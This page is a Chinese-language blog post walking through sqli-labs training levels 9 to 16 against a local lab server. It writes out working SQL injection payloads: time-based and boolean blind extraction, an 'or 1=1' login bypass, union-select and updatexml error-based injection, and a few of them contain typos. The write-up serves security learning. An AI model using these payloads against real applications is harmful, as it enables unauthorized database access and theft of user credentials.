

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>sqli-less9-16 - SuQieR&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null},"tajs":null}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816194505.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sqli-less9-16">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-08-02 14:21" pubdate>
        August 2, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      18
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sqli-less9-16</h1>
            
            <div class="markdown-body">
              <h1 id="sqli-less9-16"><a href="#sqli-less9-16" class="headerlink" title="sqli-less9-16"></a>sqli-less9-16</h1><ul>
<li>less8 是一个布尔盲注，和less5没什么区别，略过。</li>
</ul>
<h3 id="less9"><a href="#less9" class="headerlink" title="less9"></a>less9</h3><ul>
<li><p>从标题得知，less9<code>&lt;基于时间-单引号&gt;</code>,那这关明显是延迟注入了。</p>
</li>
<li><p>闭合前一个单引号，构造的延迟注入语句。(延迟注入不贴图了，记录一下payload)</p>
<pre><code class="hljs mysql"># 数据库
http:&#x2F;&#x2F;192.168.5.135&#x2F;sqli&#x2F;less-9&#x2F;?id&#x3D;1%27 and if(ascii(substr(database(),1,1))&#x3D;115,1,sleep()) --+ 	#判断数据库的第一位字符ascii是否为115，也就是字母s
http:&#x2F;&#x2F;192.168.5.135&#x2F;sqli&#x2F;Less-9&#x2F;?id&#x3D;1%27and%20If(ascii(substr(database(),2,1))&#x3D;101,1,sleep(5))--+ 
# 判断数据库名第二个字符ascii是否为101，也就是e
通过多次替换substr()的第二个参数以及if的成立条件的到数据库名security</code></pre>

<pre><code class="hljs mysql"># 查询security数据库里的数据表
http:&#x2F;&#x2F;192.168.5.135&#x2F;sqli&#x2F;Less-9&#x2F;?id&#x3D;1%27and If (ascii(substr((select table_name frominformation_schema.tables where table_schema&#x3D;&#39;security&#39;limit 0,1),1,1))&#x3D;101,1,sleep(5))--+
通过select语句查询information_schema中的security数据库的第一个表名的第一个字符ascii是否等于101，也就是e，条件成立则sleep(5)
依此类推得到emalis</code></pre>

<pre><code class="hljs mysql"># 查询security库的第二个表
查询语句与第一个表差不多，不过需要修改limit的值
http:&#x2F;&#x2F;192.168.5.135&#x2F;sqli&#x2F;Less-9&#x2F;?id&#x3D;1%27and If (ascii(substr((select table_name frominformation_schema.tables where table_schema&#x3D;&#39;security&#39;limit 1,1),1,1))&#x3D;114,1,sleep(5))--+
猜测第二个表名的第一位ascii是否为114也就是r
依次类推得到referers</code></pre>

<pre><code class="hljs mysql"># 猜测username列的值
http:&#x2F;&#x2F;192.168.5.135&#x2F;sqli&#x2F;less-9&#x2F;id&#x3D;1%27and if(ascii(substr(select username from users limit 0,1),1,1))&#x3D;68,1,slepp(5)--+
猜测username第一行的第一位
同样的通过不断尝试得到username，password列的内容，工作量太大不进行操作了</code></pre>



</li>
</ul>
<h2 id="less10"><a href="#less10" class="headerlink" title="less10"></a>less10</h2><ul>
<li>从标题得知<code>基于时间-双引号</code>,其实这关和第九关一样只是把id后的单引号替换成双引号。</li>
<li>只记录一个payload，其他的参考less9</li>
</ul>
<pre><code class="hljs mysql"># 猜测数据库
http:&#x2F;&#x2F;192.168.5.135&#x2F;sqli&#x2F;less-9&#x2F;?id&#x3D;1%27and if(ascii(substr(database(),1,1))&#x3D;115,1,sleep(5)) --+</code></pre>



<h2 id="less11"><a href="#less11" class="headerlink" title="less11"></a>less11</h2><ul>
<li><p>从less11开始url提交参数的方式由GET变成了POST。</p>
</li>
<li><p>POST和GET的区别(区别挺多的，这里记一下两个比较直观的)</p>
<ul>
<li>GET是从服务器上获取数据，POST是向服务器提交数据</li>
<li>GET把参数包含在URL中，POST通过requests body提交参数</li>
</ul>
</li>
<li><p>提交参数后浏览器页面会发生变化，不方便截图。这里改用burpsuite来进行操作。</p>
<ul>
<li>username输入<code>asdf&#39;</code>密码 <code>asdf</code>在username后输入引号触发报错</li>
</ul>
<table>
<thead>
<tr>
<th align="center">从图中可以看到报错信息多了个单引号</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816175731.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>尝试注释后面的引号，输入万能密码试一试，返回了登录信息</li>
</ul>
<table>
<thead>
<tr>
<th align="center">asdf’ or 1=1 –+</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816180046.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<pre><code class="hljs mysql">这里之所以能登录的原因是因为，当提交了username和password之后，形成的sql语句为
@$sql&#x3D;&quot;SELECT username,password FROM users WHERE username &#x3D; &#39;asdf&#39;or&#39;1&#x3D;1 --+ and password &#x3D; &#39;$passwd&#39;LIMIT0,1&quot;;
在--+ 后的内容被注释掉了，前面的or 1&#x3D;1 恒成立，所以这条语句能执行成功</code></pre>

<ul>
<li>尝试union注入， 可以看到显示的database为security</li>
</ul>
<table>
<thead>
<tr>
<th align="center">username: asdf’ union select 1,database() –+</th>
</tr>
</thead>
<tbody><tr>
<td align="center">passwd: asdf</td>
</tr>
<tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816180734.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>前面提到的GET型注入的payload都可以使用，这里不重复操作了</li>
</ul>
</li>
</ul>
<h2 id="less12"><a href="#less12" class="headerlink" title="less12"></a>less12</h2><ul>
<li><p>less12和less11相似，不过是id参数处理上有一定不同</p>
</li>
<li><p>输入双引号触发报错，从报错信息看到多了一个双引号和)说明这里的id进行了(“id”)处理</p>
<table>
<thead>
<tr>
<th align="center">username：asdf” passwd:  asdf</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816193330.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>在补全双引号和反括号之后这里同样可以使用上面的payload</p>
<table>
<thead>
<tr>
<th align="center">username: asdf”) union select  1,version() –+  passwd:asdf</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816181454.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="less13"><a href="#less13" class="headerlink" title="less13"></a>less13</h2><ul>
<li><p>输入单引号进行报错</p>
<table>
<thead>
<tr>
<th align="center">username: admin’ passwd: asdf(随便输)</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816181737.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>看到报错信息为’) ,也就是后台对id进行了(‘id’) 处理</p>
<table>
<thead>
<tr>
<th align="center">输入正确的账号密码，发现没有提示登录信息，只返回了一个是否登录的凭据</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816182810.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>使用布尔盲注猜测数据库的第一位</p>
<table>
<thead>
<tr>
<th align="center">username: asdf’) and left(database(),1) &gt; ‘a’ –+ passwd: asdf</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816183436.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>登录成功，接着可以不断对每一位进行测试，less5已经演示了，这里不重复了。</li>
<li>不过有一个值得注意的是，在测试的时候可以使用二分法可以有效降低测试的次数</li>
</ul>
</li>
</ul>
<h2 id="less14"><a href="#less14" class="headerlink" title="less14"></a>less14</h2><ul>
<li><p>这关和less13相似，对id的处理把变成了”。</p>
<table>
<thead>
<tr>
<th align="center">username: admin” passwd: admin</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816183934.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>主要是熟悉盲注的操作，列一下payload</p>
<table>
<thead>
<tr>
<th align="center">username: admin’ and left(database())&gt;’a’ –+ passwd: admin</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816184139.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>尝试updatexml()报错注入,可以看到通过XPATH报错方式返回了数据库版本号</p>
<table>
<thead>
<tr>
<th>username: admin’ and updatexml(1,concat(0x7e,(select version()),0x7e),3) –+ passed: admin</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816184505.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="less15"><a href="#less15" class="headerlink" title="less15"></a>less15</h2><ul>
<li>这关没有错误提示，只能用延迟注入判断了</li>
<li>从源代码可以看到查询语句对id进行了’id’处理</li>
</ul>
<pre><code class="hljs mysql">@$sql&#x3D;&quot;SELECT username, password FROM users WHERE username&#x3D;&#39;$uname&#39; and password&#x3D;&#39;$passwd&#39; LIMIT 0,1&quot;;</code></pre>

<ul>
<li><p>使用延时注入猜测数据库名第一位</p>
<table>
<thead>
<tr>
<th align="center">username: admin’ and if(ascii(substr(database(),1,1))=115,1,sleep(5)) –+  passwd: admin</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816191244.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>从burpsuite右下角可以看到延迟了五秒，说明执行成功。其他payload参考less5</p>
</li>
</ul>
<h2 id="less16"><a href="#less16" class="headerlink" title="less16"></a>less16</h2><ul>
<li><p>这关对id的处理方法变成了(“id”)，同样可以使用延迟注入进行解决 。</p>
</li>
<li><p>提交payload</p>
<table>
<thead>
<tr>
<th align="center">username: admin”) and if(ascii(substr(database(),1,1))=115,1,sleep(5)) –+    passwd: admin</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200816192248.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>if条件成立则延迟了五秒，其他payload参考前文。</p>
</li>
</ul>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><ul>
<li>POST型注入用工具来配合是真滴舒服</li>
<li>无回显的页面，使用延迟注入效果非常直观</li>
</ul>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Web-penetration/">Web penetration</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/sql%E6%B3%A8%E5%85%A5/">sql注入</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/08/03/sqli-less17-22/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">sqli-less17-22</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/08/01/sqli-less7%E8%AF%BB%E5%86%99%E6%96%87%E4%BB%B6/">
                        <span class="hidden-mobile">sqli-less7读写文件</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>





  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
